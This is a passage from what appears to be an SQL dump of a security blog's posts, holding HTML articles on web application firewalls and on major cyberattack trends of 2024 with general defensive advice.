[&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">On-Premise</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Installed directly within an organization’s infrastructure for full control over operations.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network Appliance</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrated as hardware within the existing network infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Should Cybersecurity Analysts Understand WAFs?</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Enhanced Web Application Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web applications are frequent targets for hackers. WAFs act as a critical line of defense, protecting applications from cyber threats, including zero-day exploits that aren’t yet widely known.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Meeting Compliance Standards</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Industry regulations, such as PCI DSS (Payment Card Industry Data Security Standard), often require WAF usage to secure consumer data. Familiarity with WAFs ensures organizations meet these legal requirements while minimizing risks of penalties and data breaches.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Proactive Threat Prevention</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs allow security professionals to prevent attacks before they even begin by utilizing behavioral analysis and implementing custom rules.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Complementary to Other Security Measures</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs work seamlessly alongside other security solutions, such as Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS), contributing to a layered, holistic cybersecurity strategy.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Protection Against Emerging Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the ability to adapt to an evolving threat landscape, WAFs are regularly updated to guard against new vulnerabilities, ensuring ongoing protection.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Learning About WAFs for Cybersecurity Beginners</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Boosted Job Prospects</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Expertise with WAFs is in high demand as web applications play critical roles in businesses of all sizes.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Improved Response to Security Breaches</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowledge of WAFs allows analysts to quickly identify, address, and minimize impacts of potential breaches.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Broader Understanding of Web Security</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learning about WAFs introduces analysts to common attack vectors like cross-site scripting and SQL injections.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Strengthened Critical Thinking Skills</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Setting up and customizing WAF rules enhances problem-solving abilities, helping analysts handle complex challenges.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges and Considerations When Using WAFs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite their many benefits, WAFs aren\'t flawless. Understanding these limitations is crucial for successful implementation:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">False Positives</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Overly strict settings might block legitimate users, potentially impacting the user experience.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Maintenance and Updates</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regular rule updates are necessary to keep pace with new threats. Outdated rules may leave security gaps.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Performance Impact</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Poorly configured WAFs can slow down applications. Fine-tuning configurations is essential.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Bypassing Risks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Advanced threat actors might find ways to evade WAF filters, requiring constant vigilance and adaptation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of WAF Technology</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of cloud-based solutions and emerging threats such as API attacks, WAFs are adopting the following innovations:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI and Machine Learning Integration</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enhanced detection algorithms use AI to identify threats while reducing false positives.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cloud-Native Features</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs are evolving to secure cloud-first architectures and microservices.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">API Protection</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">APIs are integral to businesses but vulnerable to exploitation—modern WAFs are stepping in to ensure their safety.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Integration with DevSecOps</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Embedding WAFs earlier in the development pipeline to secure applications faster and more efficiently.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Mastering WAFs Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For aspiring cybersecurity professionals, mastering WAF technology is both a necessity and an opportunity to thrive in a high-demand field. With evolving cyber threats, the ability to implement and manage WAFs ensures unparalleled protection for digital assets and critical web applications.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web Application Firewalls are a fundamental tool in cybersecurity, playing a key role in protecting enterprises against today’s rapidly evolving cyber threats. Whether you\'re a novice analyst or an experienced professional looking to sharpen your skills, understanding how to deploy and optimize WAFs will enhance your role in safeguarding web applications.</p>', '', NULL, NULL, 1, 'draft', '2025-01-09 16:45:13', '2026-01-12 21:41:44', 'Information Security', 'What is a Web Application Firewall? Why We Need to know', '', NULL),
(82, 'Biggest Cyber Attacks of 2024: Exploited Vulnerabilities and Lessons Learned', 'biggest-cyber-attacks-of-2024-exploited-vulnerabilities-and-lessons-learned', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyberattacks have surged by 70% in 2024 (Source: Cybersecurity Ventures), signaling an escalating crisis that organizations across all sectors must address. As technology evolves, so do the tactics of cybercriminals, exploiting vulnerabilities at an unprecedented scale. It’s crucial to understand these risks, identify exploited weaknesses, and adopt practical cybersecurity solutions to safeguard your digital assets.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Key trends in cyberattacks in 2024, including ransomware attacks, supply chain vulnerabilities, the surge in cloud-based attacks, and state-sponsored operations. We’ll also analyze proactive methods and essential <b><strong class=\"font-bold\">cybersecurity tips</strong></b> to arm your business against an evolving threat landscape.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Rise of Ransomware Attacks in 2024</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware remains one of the most damaging cyber threats. New reports estimate that ransomware attacks have caused over $20 billion in losses this year alone, targeting industries like healthcare and finance. Notable incidents include attacks on major healthcare providers, resulting in disrupted operations and patient care, and breaches within financial institutions that exposed sensitive customer data (Source: CNN).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Exploited Vulnerabilities Driving Ransomware Proliferation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware gangs have increasingly leaned on known exploits like Log4j and ProxyShell. These vulnerabilities provide bad actors with a foothold into system networks:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Log4j</strong></b> – A flaw in the Java-based logging library allowing attackers to take full control of target systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">ProxyShell</strong></b> – A vulnerability in Microsoft Exchange servers that attackers use to gain unauthorized access.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once identified, cybercriminals deploy ransomware, encrypt critical data, and demand hefty ransoms for decryption keys.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Tips for Proactive Ransomware Defense</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protect your business against ransomware with these strategies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regular Patching:</strong></b> Ensure all software is up to date to seal potential weak points.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Frequent Data Backups:</strong></b> Keep secure, isolated backups that can be restored without succumbing to ransom demands.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Employee Training:</strong></b> Conduct regular training focusing on recognizing phishing emails and social engineering tactics.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Supply Chain Attacks – A Growing Threat Vector</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Supply chain attacks have escalated in both frequency and sophistication, posing risks that ripple across entire industries. A single breach in a vendor’s systems can jeopardize all of their clients. An infamous example is the SolarWinds attack, where malicious updates deployed through their third-party software exposed vulnerabilities worldwide (Source: Reuters).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerabilities in Third-Party Software and Services</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With over 90% of organizations relying on external vendors, attackers frequently exploit these weak links. Common issues include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Unpatched Software:</strong></b> Lack of updates creates opportunities for breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Inefficient Security Practices:</strong></b> Vendors failing to implement robust security measures leave their clients vulnerable.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Strengthening Supply Chain Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To fortify supply chain defenses:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Vendor Vetting:</strong></b> Assess vendors’ security protocols carefully before onboarding partnerships.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Regular Security Audits:</strong></b> Identify and remediate vulnerabilities through frequent assessments.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Increasing Prevalence of Cloud-Based Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cloud infrastructure has become a tempting target for attackers as more businesses migrate their operations online. Breaches in cloud security now account for 30% of all incidents in 2024 (Source: Cloud Security Alliance). These attacks often result in compromised sensitive data, tarnishing brand reputations and eroding user trust.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Exploited Weaknesses in Cloud Systems</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two major issues driving cloud breaches are:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Misconfigurations:</strong></b> Failing to establish proper configuration leaves cloud environments exposed.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Weak Access Controls:</strong></b> Default settings or poor password policies create easy entry points for attackers.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Basics for Securing Cloud Infrastructure</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To strengthen cloud defenses:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regular Configuration Reviews:</strong></b> Verify that all security settings are optimized.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Multi-Factor Authentication (MFA):</strong></b> Add additional layers of identity verification to prevent unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Web Application Firewalls (WAF):</strong></b> Deploy WAF technology to protect cloud-hosted applications from malicious traffic.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">State-Sponsored Cyberattacks – A Geopolitical Threat</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">State-sponsored cyberattacks have become a significant challenge, with nations employing advanced tactics like social engineering and spear phishing as tools for political objectives.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Sophisticated Techniques and Long-Term Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">State actors often employ Advanced Persistent Threats (APTs) to infiltrate networks and gather intelligence over extended periods. These operations are characterized by:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Spear Phishing:</strong></b> Carefully tailored attacks targeting specific victims to gain access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Social Engineering:</strong></b> Crafting deceptive scenarios to trick individuals into surrendering sensitive information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Strengthening National Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To defend against these threats, countries must prioritize:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Improved Policies:</strong></b> Develop robust cybersecurity strategies to respond to attacks effectively.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">International Cooperation:</strong></b> Collaborate globally to share intelligence and resources for collective defense.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Cyber Threats – What Lies Ahead</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Emerging technologies bring new vulnerabilities. Two trends stand out as rapidly evolving threats to track in 2024 and beyond.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">AI-Powered Attacks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI is not only a tool for defense—it’s being weaponized by cybercriminals. Attackers are using AI to automate, scale, and refine their operations, making them faster and more difficult to detect.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">IoT Security Vulnerabilities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Internet of Things (IoT) devices, from smart home systems to industrial equipment, introduce unique risks. Many lack built-in security, creating easy gateways for attackers to breach larger networks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Preparing for the Next Chapter of Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To stay ahead of these threats:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Continuous Training:</strong></b> Update cybersecurity teams regularly on new methodologies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Adaptive Security:</strong></b> Invest in solutions capable of evolving alongside threats.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Organizations Can Stay Protected</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The surge in cyberattacks in 2024 has made one thing clear—businesses must adopt a proactive approach to secure their systems. Here’s what you can implement today to mitigate risks:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc 